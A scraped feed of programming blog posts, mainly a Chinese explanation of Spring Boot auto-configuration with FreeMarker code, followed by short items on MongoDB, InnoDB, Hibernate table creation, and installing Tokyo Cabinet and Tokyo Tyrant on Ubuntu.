(1)@Configuration,是org.springframework.context.annotation包里面的注解。这么说吧,用@Configuration注解该类,等价 与XML中配置beans;用@Bean标注方法等价于XML中配置bean。

(2)@ConditionalOnClass,org.springframework.boot.autoconfigure.condition包里面的注解。意思是当类路径下有指定的类的条件下,才会去注册被标注的类为一个bean。在上面的代码中的意思就是,当类路径中有freemarker.template.Configuration.class,FreeMarkerConfigurationFactory.class两个类的时候,才会实例化FreeMarkerAutoConfiguration这个Bean。

(3)@AutoConfigureAfter,org.springframework.boot.autoconfigure包里面的注解。这个通过注解的名字意思就可以知道,当WebMvcAutoConfiguration.class这个类实例化完毕,才能实例化FreeMarkerAutoConfiguration(有个先后顺序)。SpringBoot使用@ AutoConfigureBefore、@AutoConfigureAfter注解来定义这些配置类的载入顺序。

(4)@EnableConfigurationProperties,表示启动对FreeMarkerProperties.class的内嵌配置支持,自动将FreeMarkerProperties注册为一个bean。这个FreeMarkerProperties类里面就是关于FreeMarker属性的配置:

@ConfigurationProperties(prefix = "spring.freemarker") public class FreeMarkerProperties extends AbstractTemplateViewResolverProperties {      public static final String DEFAULT_TEMPLATE_LOADER_PATH = "classpath:/templates/";      public static final String DEFAULT_PREFIX = "";      public static final String DEFAULT_SUFFIX = ".ftl";      /**      * Well-known FreeMarker keys which will be passed to FreeMarker's Configuration.      */     private Map<String, String> settings = new HashMap<>();      /**      * Comma-separated list of template paths.      */     private String[] templateLoaderPath = new String[] { DEFAULT_TEMPLATE_LOADER_PATH };      /**      * Prefer file system access for template loading. File system access enables hot      * detection of template changes.      */     private boolean preferFileSystemAccess = true;      public FreeMarkerProperties() {         super(DEFAULT_PREFIX, DEFAULT_SUFFIX);     }      public Map<String, String> getSettings() {         return this.settings;     }      public void setSettings(Map<String, String> settings) {         this.settings = settings;     }      public String[] getTemplateLoaderPath() {         return this.templateLoaderPath;     }      public boolean isPreferFileSystemAccess() {         return this.preferFileSystemAccess;     }      public void setPreferFileSystemAccess(boolean preferFileSystemAccess) {         this.preferFileSystemAccess = preferFileSystemAccess;     }      public void setTemplateLoaderPath(String... templateLoaderPaths) {         this.templateLoaderPath = templateLoaderPaths;     }  }

综上,当(1)(2)两个条件满足时,才会继续(3)(4)的动作,同时注册FreeMarkerAutoConfiguration这个Bean。该类的结构如下图:


我们来看其内部类FreeMarkerWebConfiguration的代码:

    @Configuration     @ConditionalOnClass(Servlet.class)     @ConditionalOnWebApplication(type = Type.SERVLET)     public static class FreeMarkerWebConfiguration extends FreeMarkerConfiguration {          @Bean         @ConditionalOnMissingBean(FreeMarkerConfig.class)         public FreeMarkerConfigurer freeMarkerConfigurer() {             FreeMarkerConfigurer configurer = new FreeMarkerConfigurer();             applyProperties(configurer);             return configurer;         }          @Bean         public freemarker.template.Configuration freeMarkerConfiguration(                 FreeMarkerConfig configurer) {             return configurer.getConfiguration();         }          @Bean         @ConditionalOnMissingBean(name = "freeMarkerViewResolver")         @ConditionalOnProperty(name = "spring.freemarker.enabled", matchIfMissing = true)         public FreeMarkerViewResolver freeMarkerViewResolver() {             FreeMarkerViewResolver resolver = new FreeMarkerViewResolver();             this.properties.applyToViewResolver(resolver);             return resolver;         }          @Bean         @ConditionalOnMissingBean         @ConditionalOnEnabledResourceChain         public ResourceUrlEncodingFilter resourceUrlEncodingFilter() {             return new ResourceUrlEncodingFilter();         }      }

其中,
(1)@ConditionalOnWebApplication(type = Type.SERVLET), 是当该应用是基于Servlet的Web应用时。

(2)@ConditionalOnMissingBean(name = "freeMarkerViewResolver"),是当Spring容器中不存在freeMarkerViewResolver的Bean时。

(3)@ConditionalOnProperty(name = "spring.freemarker.enabled", matchIfMissing = true),指定的spring.freemarker.enabled属性是否有。如果没有(IfMissing),设为true。

当(1)(2)(3)三个条件都满足,则注册freeMarkerViewResolver这个Bean。

我们也可以自定义我们自己的my-starter,以及实现对应的@MyEnableAutoConfiguration。SpringBoot有很多第三方starter,其自动配置的原理基本都是这样,比如mybatis-spring-boot-starter的MybatisAutoConfiguration,阅读源码https://github.com/mybatis/spring-boot-starter[4]。

上面文字描述了这么多,再用一张形象生动的图来说明[5]:


SpringBoot Autoconfigure 工作原理图

5.5 spring.factories与定义应用程序的初始化行为

上面说了这么多,讲的都是读取properties文件中key为org.springframework.boot.autoconfigure.EnableAutoConfiguration的全限定名对应的值。SpringBoot内部还有许多其他的key用于过滤得到需要加载的类。

# Initializers org.springframework.context.ApplicationContextInitializer=\ org.springframework.boot.autoconfigure.SharedMetadataReaderFactoryContextInitializer,\ org.springframework.boot.autoconfigure.logging.AutoConfigurationReportLoggingInitializer  # Application Listeners org.springframework.context.ApplicationListener=\ org.springframework.boot.autoconfigure.BackgroundPreinitializer  # Auto Configuration Import Listeners org.springframework.boot.autoconfigure.AutoConfigurationImportListener=\ org.springframework.boot.autoconfigure.condition.ConditionEvaluationReportAutoConfigurationImportListener  # Auto Configuration Import Filters org.springframework.boot.autoconfigure.AutoConfigurationImportFilter=\ org.springframework.boot.autoconfigure.condition.OnClassCondition  # Failure analyzers org.springframework.boot.diagnostics.FailureAnalyzer=\ org.springframework.boot.autoconfigure.diagnostics.analyzer.NoSuchBeanDefinitionFailureAnalyzer,\ org.springframework.boot.autoconfigure.jdbc.DataSourceBeanCreationFailureAnalyzer,\ org.springframework.boot.autoconfigure.jdbc.HikariDriverConfigurationFailureAnalyzer  # Template availability providers org.springframework.boot.autoconfigure.template.TemplateAvailabilityProvider=\ org.springframework.boot.autoconfigure.freemarker.FreeMarkerTemplateAvailabilityProvider,\ org.springframework.boot.autoconfigure.mustache.MustacheTemplateAvailabilityProvider,\ org.springframework.boot.autoconfigure.groovy.template.GroovyTemplateAvailabilityProvider,\ org.springframework.boot.autoconfigure.thymeleaf.ThymeleafTemplateAvailabilityProvider,\ org.springframework.boot.autoconfigure.web.servlet.JspTemplateAvailabilityProvider

这些key仍然是定义在spring-boot/spring-boot-autoconfigure/src/main/resources/META-INF/spring.factories文件中。

还有对应的用于测试的自动配置,在
spring-boot/spring-boot-test-autoconfigure/src/main/resources/META-INF/spring.factories文件中定义。

另外,我们使用spring.factories里还可以定制应用程序的初始化行为。这样我们就可以在应用程序载入前操纵Spring的应用程序上下文ApplicationContext。

例如,可以使用ConfigurableApplicationContext类的addApplicationListener()方法,在应用上下文ApplicationContext中创建监听器。

自动配置运行日志报告功能就是这么实现的。我们来看在spring.factories中,Initializers一段的配置:

# Initializers org.springframework.context.ApplicationContextInitializer=\ org.springframework.boot.autoconfigure.SharedMetadataReaderFactoryContextInitializer,\ org.springframework.boot.autoconfigure.logging.AutoConfigurationReportLoggingInitializer

其中,AutoConfigurationReportLoggingInitializer监听到系统事件时,比如上下文刷新ContextRefreshedEvent或应用程序启动故障ApplicationFailedEvent之类的事件,Spring Boot可以做一些事情。这里说的代码在AutoConfigurationReportLoggingInitializer.AutoConfigurationReportListener里面。关于支持的事件类型supportsEventType的如下:

    private class AutoConfigurationReportListener implements GenericApplicationListener {  ...         @Override         public boolean supportsEventType(ResolvableType resolvableType) {             Class<?> type = resolvableType.getRawClass();             if (type == null) {                 return false;             }             return ContextRefreshedEvent.class.isAssignableFrom(type)                     || ApplicationFailedEvent.class.isAssignableFrom(type);         }          @Override         public boolean supportsSourceType(Class<?> sourceType) {             return true;         }          @Override         public void onApplicationEvent(ApplicationEvent event) {     AutoConfigurationReportLoggingInitializer.this.onApplicationEvent(event);         }      }

要以调试模式启动应用程序,可以使用-Ddebug标识,或者在application.properties文件这添加属性debug= true。这样,当我们以调试模式启动应用程序时,SpringBoot就可以帮助我们创建自动配置的运行报告。对于每个自动配置,通过报告我们可以看到它启动或失败的原因。 这个报告内容格式大致如下:

========================= AUTO-CONFIGURATION REPORT =========================   Positive matches: -----------------     DataSourceAutoConfiguration matched:       - @ConditionalOnClass found required classes 'javax.sql.DataSource', 'org.springframework.jdbc.datasource.embedded.EmbeddedDatabaseType'; @ConditionalOnMissingClass did not find unwanted class (OnClassCondition)     DataSourceAutoConfiguration#dataSourceInitializer matched:       - @ConditionalOnMissingBean (types: org.springframework.boot.autoconfigure.jdbc.DataSourceInitializer; SearchStrategy: all) did not find any beans (OnBeanCondition)     DataSourceAutoConfiguration.PooledDataSourceConfiguration matched:       - AnyNestedCondition 2 matched 0 did not; NestedCondition on DataSourceAutoConfiguration.PooledDataSourceCondition.PooledDataSourceAvailable PooledDataSource found supported DataSource; NestedCondition on DataSourceAutoConfiguration.PooledDataSourceCondition.ExplicitType @ConditionalOnProperty (spring.datasource.type) matched (DataSourceAutoConfiguration.PooledDataSourceCondition)       - @ConditionalOnMissingBean (types: javax.sql.DataSource,javax.sql.XADataSource; SearchStrategy: all) did not find any beans (OnBeanCondition)     ...  Exclusions: -----------      None   Unconditional classes: ----------------------      org.springframework.boot.autoconfigure.web.WebClientAutoConfiguration      org.springframework.boot.autoconfigure.context.PropertyPlaceholderAutoConfiguration      org.springframework.boot.autoconfigure.context.ConfigurationPropertiesAutoConfiguration      org.springframework.boot.autoconfigure.info.ProjectInfoAutoConfiguration

除了SpringBoot官方提供的starter外,还有社区贡献的很多常用的第三方starter,列表可参考[2]。

另外,国内很多公司使用RPC框架dubbo,关于SpringBoot集成dubbo,可参考:https://github.com/linux-china/spring-boot-dubbo。

参考资料:

1.http://docs.spring.io/spring-boot/docs/current/reference/htmlsingle/#using-boot-starter
2.https://github.com/spring-projects/spring-boot/tree/master/spring-boot-starters
3.http://www.cnblogs.com/javaee6/p/3714719.html
4.https://github.com/mybatis/spring-boot-starter
5.https://afoo.me/posts/2015-07-09-how-spring-boot-works.html



作者:华夏商周秦汉唐宋元明清中华民国
链接:http://www.jianshu.com/p/ccadc2bdb6d7
來源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


小马歌 2017-08-02 16:35 发表评论

          Let’s do this the hard way        
Recent discoveries of security vulnerabilities in Rails and MongoDB led me to thinking about how people get to write software. In engineering, you don’t get to build a structure people can walk into without years of study. In software, we …
          Re: How important is it to use 2-byte and 3-byte integers?        

Some additional discussion here:
https://github.com/github/g...

For some semi-proof of InnoDB buffer pool not being var-length in memory, you can see with pfs memory instrumentation in 5.7. The buffer pool is all one allocation just larger than innodb_buffer_pool_size.


          JUGademy#5        
#1. Wprowadzenie do MongoDB / Justyna Walkowska Wprowadzenie do MongoDBabstrakt: MongdoDB to popularna nierelacyjna baza danych, oparta na dokumentach w formacie JSON. W prezentacji postaram się omówić następujące zagadnienia: – MongoDB na tle innych baz danych – Instalacja MongoDB – Format danych – Interakcja bezpośrednio z bazą danych – Komunikacja z bazą danych z kodu napisanego w … Continue reading JUGademy#5
          Comment on linux script to check if a service is running and start it, if it’s stopped by venu        
Hi every one i want to monitor apache2 mysql nodejs mongodb services with shell script please give me the script for this..thank you
          Comment on How to get the MongoDB server version using PyMongo by Ross Farinella        
Updated code to include the slicker-looking "server_info()" call -- thanks Mike!
          Comment on How to get the MongoDB server version using PyMongo by Mike Dirolf        
Good tip! You can also use the server_info() method on a Connection instead of running the command manually. There are some tools (meant just for testing, but might be worth a look) that do this in the `test/version.py` file in the PyMongo source tree.
          Converting MyISAM to InnoDB and a lesson on variance        
I'm about to start working through converting a large MySQL installation to InnoDB. For the particular use case durability is desired, and with MyISAM a loss of power almost certainly guarantees data loss. Durability is not available as an option. So the normal question people ask is.. okay, what do I pay for this feature? … Continue reading Converting MyISAM to InnoDB and a lesson on variance
          Changing default users collection name for accounts package in Meteor        
We ran into a peculiar issue while working with Meteor at Gummicube. We had two separate Meteor application that both needed to access the same MongoDB since they shared many of the same collections, but they needed to have their own users collections. This was a problem, since the users collection always had the default […]
          Postmortem: Migrating MongoDB to DynamoDB        
Introduction DynamoDB, a relatively new arrival to the NoSQL party, celebrated its three-year anniversary earlier this year. We have now seen it deployed in mature products like the portfolio of online games at TinyCo and our own app store optimization solution) at Gummicube. It’s pay-as-you-go, it’s extremely scalable, with basically zero administration overhead. However, it […]
          Couchbase vs. DynamoDB for Free-To-Play Games        
Perry and I used to joke about what will get released first: FableLab’s next game or Couchbase 2.0.  And yes, he won 🙂  But that does mean that I get the option to use the new version to power my next game.  Besides key operational improvement, 2.0 also added several key features that were missing […]
          How to connect MongoDB using PHP        
After posting content about MongoDB, just thinking of posting another content about MongoDB but with PHP. Yes this post about connecting MongoDB with PHP,  if your are using Windows OS you can check with below link about MongoDB installations & enable extension in Wamp Server. Installing MongoDB in Windows OS How to enable MongoDB extension in WampServer […]
          How to enable MongoDB extension in WampServer        
This post will teach about how to enable MongoDB extension in WampServer for PHP 5.5.12 version. If you have not installed MongoDB in your system you can check this post Installing MongoDB in Windows OS. List of things need to installed before enabling MongoDB in WampServer. WampServer 2.5 MongoDB 3.0 If everything is installed, then we […]
          Installing MongoDB in Windows OS        
MongoDB is a cross-platform document-oriented database which store data in json structure key pair value. It’s easy to integration data. But we are going to see about installing MongoDB in Windows OS.  MongoDB support four Operting System Windows, Linux, Mac OS X and Solaris. Also you can download Current, Previous and Development release. https://www.mongodb.org/downloads We are […]
          hibernate annoation (二创建表)        

为了追踪hibernate的信息 <property name="hibernate.show_sql">true</property>

 æ–°å»ºUserç±»:

 

@Entity
@Table(name="E_USER",uniqueConstraints={
@UniqueConstraint(columnNames={"yahoo"})
})
public class User {

private int id;
private String yahoo; //昵称唯一

@Id
@GeneratedValue(strategy=GenerationType.AUTO)
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public String getYahoo() {
return yahoo;
}
public void setYahoo(String yahoo) {
this.yahoo = yahoo;
}

}

 åˆ›å»ºè¡¨ 首先在hibernate.cfg.xml里配置<mapping class="com.eric.po.User"/>说明:使用annoation同样可以接受.hbm.xml文件

 1,以手动创建

   DROP TABLE IF EXISTS `e_user`;
CREATE TABLE `e_user` (
  `id` int(11) NOT NULL auto_increment,
  `yahoo` varchar(255) default NULL,
  PRIMARY KEY  (`id`),
  UNIQUE KEY `yahoo` (`yahoo`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

 2,使用<property name="hbm2ddl.auto">create</property>属性来自动创建

 3,SchemaExport : new SchemaExport(new AnnotationConfiguration().configure()).create(true,true);

     create(true,true):两个参数:   

Java代码 复制代码
  1. @param script print the DDL to the console   
  2. @param export export the script to the database  

   hibernate建表语句:

  drop table if exists E_USER
 create table E_USER (id integer not null auto_increment, yahoo varchar(255), primary key (id), unique (yahoo))



疯狂 2009-11-02 14:58 发表评论

          InnoDB Primary Key versus Secondary Index: An Interesting Lesson from EXPLAIN        
InnoDB Primary Key versus Secondary Index: An Interesting Lesson from EXPLAIN
          MySQL Server 5.6.21        
  • InnoDB; Partitioning: Large numbers of partitioned InnoDB tables could consume much more memory…

Download | Version Info | Change log | Screenshots | System Requirements | Comments


          My cf.Objective() 2013 Presentations        

Other than noting back in January that all three(!) of my talk proposals were accepted, I haven't blogged about them since, so the only information about them is on the cf.Objective() web site. The session overviews give a fair sense of what you should get out of each presentation and roughly what they'll cover.

Since I have just now finished the three presentations and got all the code working, I thought I'd write up some thoughts about the talks, to help folks who are on the fence decide 'for' or 'against'.

  • Learn You a What for Great Good?, subtitled Polyglot Lessons to Improve Your CFML, this talk looks at some idioms and constructs in JavaScript, Groovy and Clojure (with a brief mention of Scala too), and shows how you can apply them to CFML. A common thread thru the examples is closures, added in ColdFusion 10 and Railo 4, and the code examples make heavy use of them, showing map, reduce, and filter functions operating on CFML arrays and structs to provide many of the benefits that collections have been providing to other languages for quite some time. From JavaScript, I also look at prototype-based objects, and show how to implement that in CFML.
  • ORM, NoSQL, and Vietnam plays on blog posts by Ted Neward and Jeff Atwood to put Object-Relational Mapping under the microscope and look at where the mapping breaks down and how it can "leak" into your code, making your life harder. After that I take a quick walk thru the general "No-SQL" space and then focus on document-based data stores as a good (better?) match for OOP and provide examples based on MongoDB and cfmongodb, with a quick look at how common SQL idioms play out in that world.
  • Humongous MongoDB looks at replica sets, sharding, read preference, write concern, map/reduce and the aggregation framework, to show how MongoDB can scale out to support true "Big Data". The talk will feature a live demo of setting up a replica set and using it from CFML, including coping robustly with failover, and a live demo of setting up a sharded cluster (and using it from CFML) to show how MongoDB handles extremely large data sets in a fairly simple, robust manner.

At the start of each of my talks, I have a "You Might Prefer..." slide listing the alternative talks you can attend if you don't fancy mine after you've seen the agenda slide - I won't be offended!

The slides (and all code) will be available after the conference. I'll post the slides to my presentations page and the code will go up on my Github repository. If any user groups would like me to do remote presentations of these talks later in the year (and record them and post them to Charlie Arehart's UGTV site), just contact me to figure out dates and times.


          Comment on Super Simple Storage for Social Web Data with MongoDB (Computing Twitter Influence, Part 4) by Matthew A. Russell        
To be honest, I probably don't understand enough about your situation to offer too much prescriptive advice here, and a lot of my initial questions back would be directed at figuring out if you *really* need Django+MongoDB specifically, or if there are existing admin UIs for MongoDB that might work or other approaches all together. Not sure if this link provides any administration UIs that might be useful to your situation, but I thought I'd go ahead and pass it on in case you hadn't run across it: http://docs.mongodb.org/ecosystem/tools/administration-interfaces/ More to your point, though, I don't have any great suggestions on how to do what you are asking apart from finding an existing admin UI for MongoDB or writing some custom model code.
          Comment on Super Simple Storage for Social Web Data with MongoDB (Computing Twitter Influence, Part 4) by hahaconda        
Matthew, is it possible to make tutorials on how to integrate django and mining to show tweets i mined in web interface? The problem here that Django is highly relational in its nature, and even if i would use http://django-mongodb-engine.readthedocs.org/en/latest/tutorial.html or http://mongoengine-odm.readthedocs.org/en/latest/tutorial.html i still need to make a model classes with relations (thats ruins advantages of using such approach). What i want is to store tweets in Mongodb as json and then (without writing models) show them in the admin and user interface (maybe only screen names, date, retweet status) - but i still need to save all tweet, not only certain fields. What's your advice?
          Comment on Quick Start by How To Mine Your GMail with Google Takeout and MongoDB | Mining the Social Web        
[…] Quick Start […]
          "A Lightweight Disk based JSON Database with a MongoDB like API for Node."        
“A Lightweight Disk based JSON Database with a MongoDB like API for Node.”

- diskDB by arvindr21
          New release of Abaqus2Matlab: GUI, reading .odb and much more!        

A2M GUI interface 

Dear imechanicians,

A new version of Abaqus2Matlab has just been released and I hope that it is of interest to you.

This new release constitutes a very significant step forward in the development of this well-known software to connect Abaqus and Matlab.

Abaqus2Matlab is now offered as an easy-to-install Matlab App that includes the following novelties:

 

  • The possibility to postprocess not only .fil files, but also .odb and .mtx
  • A new Graphical User Interface (GUI) that enables the user to easily request output variables and automatically creates a Matlab script with all the required information.

 

Everything has been extensively documented, including video tutorials. For more information visit www.abaqus2matlab.com

We hope that you enjoy it and we look forward to hearing your feedback


          Heat Transfer and static analysis of steel beam shell element (odb. output)        

Hi all...

I have difficulties in extracting odb file of steel beam of shell element heat transfer analysis along with fire protection element. I have edited the keyword editor to to produce NT of nodal temperature to be integrate in the static analysis. But, in the static analysis results, the steel beam exhibit same value of deflection even though I use various thickness of coating protection onto the steel beam. Is it possible to produce TEMP value instead of NT (nodal temperature) inside the odb. file. It seems that the TEMP file are more realistic value of member temperature through section points. However, I could not find any way extract odb. file with temperature of TEMP file. How can I write in the keyword editor to extract TEMP file to odb. output file? So that the odb. file with TEMP output can be read in the static analysis instead of NT file (nodal temperature).

Can anyone have an idea that could help to solve this problem? Suppose to be the steel beam beam exhibit a decreasing value of member temperature when expose to heat with the application of protection material. From there onwards, suppose to the steel beam deflection will also exhibit an less deflection due to decreasing temperature which has been determined in the heat transfer analysis earlier. I would really appreciate for the help given.

Thank you


          Install MongoDB dengan Xampp di Ubuntu        
Mau curhat sedikit hasil coba-coba instalasi MongoDB di Ubuntu 10.10 ane tapi inginnya bisa langsung integrasi dengan xampp. Sempet muter-muter internet sampe bingung gimana cara install MongoDB ini. Banyak contoh tapi ga ada yang pas, entah memang ga cocok atau otak yang lagi bebel, maklum lagi di kejar2 skripsi jadi suka ga sinkron.. :nohope

Beruntung ketemu sama situs ini, klop banget sama yang dimaksud tapi sayang bahasanya dewa, hehe.. Di situs lain caranya berbeda-beda, ada yang mulai dari install php stand-alone, trus install pecl, duh ribet.. Tapi intinya sih ikutin langkah-langkah dari situs ini.

Ga mau ambil pusing, akhirnya ane lebih pilih pake xampp aja. Kebetulan sudah pernah install xampp biasa. Caranya sih gampang ajah, banyak koq tutorialnya. Nah, bedanya disini kita butuh yang versi development dari xampp, gunanya apa masih blum tahu tapi sepertinya ada sangkut pautnya sama PHP API plus Zend Module API.. cmiiw

Oia, yang belum tahu apa itu MongoDB bisa meluncur ke situs resminya di
http://www.mongodb.org/
Oke, mulai langsung install aja gan. Step pertama install dulu xampp versi development seperti yang sudah kita bahas di awal. Caranya sama seperti install xampp biasa, yang buat linux loh gan jangan yang lain. Download dari situs resmi xampp, atau pakai link ini. Ini versi 1.7.4, tapi jangan lupa untuk install xampp versi biasa terlebih dahulu, ok.. Sintaks buat extract setelah download nih gan :

Lanjut, install MongoDB. Cara paling mudah pakai apt-get atau synaptic package manager dan tentunya harus ada koneksi internet. Anggaplah kita sudah sedia koneksi internet. Hari gini gan belom konek internet, hehehe just kidding.. :p

Untuk install MongoDB lewat synaptic bisa search dengan keyword mongodb lalu mark mongodb-10gen. Package ini yang nantinya akan terinstall di Ubuntu agan.
Trus gimana caranya install lewat terminal gan? Ane mah ga biasa yang GUI..
Caranya ya sama seperti install package biasa. Perintahnya gan :

Asumsi sampai sini sudah terinstall MongoDB di ubuntu agan-agan sekalian. Kalau ada masalah ya silahkan comment disini supaya bisa kita cari sama2 solusinya, atau mau coba cari sendiri juga boleh..

Selanjutnya kita koneksikan xampp dengan MongoDB dengan menggunakan driver PHP MongoDB. Ga lucu kan kalo udah install MongoDB tapi ga bisa dipake di web buatan kita, hoho..

Tutorial resminya ada disini kalau agan minat dengan cara sendiri, tapi buat ane sih malah jadi bingung karena disitu justru disuruh install pecl sedangkan xampp sudah punya pecl paketan dalam instalasinya dan lagi langkah-langkahnya ga lengkap, malah jadi keblinger sendiri, akhirnya ane memutuskan untuk coba cara manual build driver dari sourcenya..

Sebelumnya atur dulu PATH, ini gunanya biar kita ga ribet waktu instalasi. Tapi ada juga yang menambahkan setting untuk LD_LIBRARY_PATH, tapi waktu ane coba dengan cara setting LD_LIBRARY_PATH justru banyak program yang error. Sempet cari-cari kenapa dan ketemu sama salah satu situs yang punya statemen kalau modifikasi LD_LIBRARY_PATH itu agak-agak harmful, karena banyak dinamic library yang mesti kita link ulang supaya bisa jalan sesuai dengan fungsinya, betul ga ya??? setidaknya sampe situ pemahaman saya, cmiiw..
Untuk set path tinggal tambah baris dibawah ini ke /etc/bash.bashrc,

Balik lagi ke driver. Link untuk download drivernya : 
https://github.com/mongodb/mongo-php-driver/downloads
Kalau sudah download, lalu extraxt dimana saja terserah agan deh. Setelah itu masuk ke direktori hasil extract, trus ketik perintah ini :

Sampe sini mudah-mudahan lancar di kompi agan-agan, seperti biasa kalau ada error post aja kesini sebisa mungkin ane bantu..

Nah, jangan buru-buru ditutup terminalnya, coba perhatikan dulu ada atau tidak baris :
/opt/lampp/lib/php/extensions/no-debug-non-zts-/mongo.so

Jangan bingung sama gan, itu cuma id hasil generate github waktu agan download drivernya. Cek aja tuh mongo.so udah ada di tkp atau belum. Kalau sudah berarti building driver sukses.

Langkah selanjutnya aktifkan module mongo.so di php.ini. Buka php.ini di /opt/lampp/etc/php.ini lalu tambahkan baris ini :

Langkah terakhir restart xampp, dan MongoDB plus driver sudah terinstall di ubuntu kesayangan agan ditambah koneksi ke xampp. Untuk test terakhir ane pake software management MongoDB berbasis web, Phpmoadmin, situsnya :
http://www.phpmoadmin.com/
Sekian dulu curhatan ane kali ini, mudah-mudahan bisa bermanfaat buat agan-agan sekalian..

          Weekly Update – January 20, 2015        
      Total Deal Value (USD) – $1,595,370,011           Total Deal Number – 60 Deal No. Amount Paid (USD) Company Investor/Buyer Sector Deal Type 1 $600,000,000 Kuaidi Dache Consortium Mobile & Apps Investment 2 $220,000,000 Instacart Consortium Transactions Investment 3 $186,000,000 lynda.com Consortium Media Investment 4 $80,000,000 MongoDB Consortium Software & Services Investment 5 $55,000,000 […]
          Maxwell Health Reduces Cloud Storage Costs and Recovery Times with Datos IO RecoverX for Cloud Backup and Recovery        
Datos IO’s RecoverX platform solves operational challenges and reduces total cost of ownership for Maxwell’s SaaS based platform on MongoDB databases deployed on Amazon AWS public cloud SAN JOSE, Calif., Aug. 10, 2017 — /BackupReview.info/ — Datos IO, the application centric cloud data management company, today announced that Maxwell Health, an HR and benefits technology [...] Related posts:
  1. Datos IO Extends RecoverX to Meet Backup and Recovery Needs for Cloud-Native Workloads On Amazon Web Services
  2. TechTarget Names Datos IO RecoverX Storage Product of the Year Finalist
  3. Datos IO RecoverX Selected as Product of the Year 2016 by Storage Magazine
  4. Datos IO Introduces RecoverX, Industry-First Scale-Out Data Protection Software for Cloud Native and Big Data Environments
  5. Datos IO Teams with NetApp to Deliver Transformational All-Flash Storage and Cloud Data Protection Solution for Next-Generation Data Center Applications

          Senior Software Engineer Home office munkakörbe keresünk munkatársat. | Feladatok: Implementing...        
Senior Software Engineer Home office munkakörbe keresünk munkatársat. | Feladatok: Implementing new functionality and user interactions, in tandem with corresponding changes to the API back-end. • Improving usability, speed and ensuring our pages render responsively on various browser sizes • Extending the capabilities of our back-end platform?s API, including helping move to our new v2 API. • Helping us move away from a monolithic Rails backend towards a more Service-Oriented Architecture • Refactoring and bug-fixing the platform • Extending our test coverage. | Mit ajánlunk: Attractive opportunity: • Entrepreneurial and non-hierarchical working environment • Interesting co-workers with diverse and international backgrounds • Comfort of working from home | Elvárások: Technical Requirements: • Degree educated with a minimum of 3 years software development experience • Experience in Object Oriented languages & domain driven design • Experience in Behaviour-Driven and/or Test-Driven Development • Strong understanding of HTML, CSS and JavaScript • Strong understanding of the HTTP request/response cycle, and the operation of modern web frameworks • Strong understanding of MVC architectures, object-oriented design, database design, JSON APIs and agile development techniques • Experience with MySQL, PostgreSQL or similar RDBMS • Unix / Linux / Mac OS X command-line proficiency • Version control, preferably with Git • Experience with Redis, ElasticSearch and MongoDB a plus • Experience in Behaviour-Driven and/or Test-Driven Development a plus • A passion for clean, simple, well-tested code • Proven track-record in open source a plus • Proven track-record in full-stack performance enhancement a plus • • Other Requirements: • Ability to work & communicate effectively with a geographically dispersed team • Ability to work in an Agile software environment with high level requirements • Must be flexible and able to work with changing priorities • Must be within European Time-zones • Must have excellent written and verbal English language skills | További infó és jelentkezés itt: www.profession.hu/allas/1053745
          Java fejlesztő munkakörbe keresünk munkatársat. | Feladatok: Részvétel a vállalat Java technoló...        
Java fejlesztő munkakörbe keresünk munkatársat. | Feladatok: Részvétel a vállalat Java technológiákra alapuló SW fejlesztési projektjeiben • Részvétel SW követelmények analízisében, SW tervezésben • Részvétel a célfeladatokra alakult teamek 2-5 fő munkájában • SW implementáció, dokumentáció, integráció, tesztelés. | Mit ajánlunk: Stabil, nemzetközi háttér • Érdekes és változatos, szakmai kihívást jelentő feladatok • Folyamatos szakmai fejlődés izgalmas, innovatív projekteken keresztül • Motiváló, segítőkész csapat • Versenyképes jövedelem | Elvárások: Magabiztos, minimum 2-3 éves Java Spring fejlesztői tapasztalattal rendelkezel • Tapasztalatod van komplex web alkalmazások fejlesztésében • Ismersz és használsz alkalmazás szervereket Tomcat, Wildfly • Nem idegenek számodra az NOSQL adatbázis kezelő rendszerek MONGODB • Vaadin framework fejlesztői tapasztalattal rendelkezel • Foglalkoztál már HTML5 és CSS3, valamint SCSS karakterkódolással • Önállóan, kreatívan és proaktív hozzáállással végzed munkádat • Szeretsz kommunikálni, kapcsolatot tartani és együttműködni másokkal • Középfokú aktív angol nyelvtudással rendelkezel | További elvárások: Felsőfokú szakirányú végzettség • Relációs adatbázis-kezelők ismerete Oracle, MS SQL, MySQL, stb. • Jasper riport ismerete • GIT verziókezelő ismerete | További infó és jelentkezés itt: www.profession.hu/allas/1050250
          MongoDB Atlas is now available on top cloud platforms        
MongoDB+has+announced+that+MongoDB+Atlas%2C+its+cloud+database+as+a+service%2C+is+now+available+to+u
          MongoDB delivers financial data up to 250x faster says IHS Markit        
The+data+delivery+service+is+powered+by+a+complex+infrastructure+originally+built+on+a+relational+da
          Install Tokyo Tyrant on Ubuntu (with Lua)        

I’ve been getting increasingly interested in alternative databases of late. With alternative I mean non-relational databases of course.

There are a number of document / key value stores in development at the moment. They include projects like HBase, CouchDB, MongoDB and much more.

What has really grabbed my attention at the moment is Tokyo Cabinet. It’s a fascinating datastore that promises excellent performance along with great data security features like master-master replication.

This post isn’t about the features of Tokyo Cabinet, it’s about getting it installed so you can start playing with it yourself. The Igvita blog has a great write-up about why Tokyo Cabinet is relevant, so head over to Tokyo Cabinet: Beyond Key-Value Store for the juicy details. Once you’re impressed, head back here to install it and start playing!

The latest sources for Tokyo Cabinet at time of writing is 1.4.29 and Tokyo Tyrant is 1.1.31.

First, lets install some build dependencies:


sudo apt-get install checkinstall build-essential libbz2-dev zlib1g-dev libreadline5-dev


$ mkdir /src $ cd /src

We need to install Lua first. Download the sources, extract them and change into the source folder:


$ cd /src$ wget http://www.lua.org/ftp/lua-5.1.4.tar.gz$ tar zxf lua-5.1.4.tar.gz$ cd lua-5.1.4

Now lets compile it.


$ make linux test $ make install

Once that’s done, it should print out something like the following:


Hello world, from Lua 5.1!

Now we download and compile Tokyo Cabinet (latest version at time of writing is 1.4.29):


$ cd /src $ wget http://tokyocabinet.sourceforge.net/tokyocabinet-1.4.29.tar.gz $ tar xvf tokyocabinet-1.4.29.tar.gz $ cd tokyocabinet-1.4.29 $ ./configure; make; make install

Next up is Tokyo Tyrant (latest version at time of writing is 1.1.31):


$ cd /src $ wget http://tokyocabinet.sourceforge.net/tyrantpkg/tokyotyrant-1.1.31.tar.gz $ tar xvf tokyotyrant-1.1.31.tar.gz $ cd tokyotyrant-1.1.31 $ ./configure --enable-lua; make; make install

To test that Tokyo Tyrant is installed and working, type the following:


$ ./ttserver

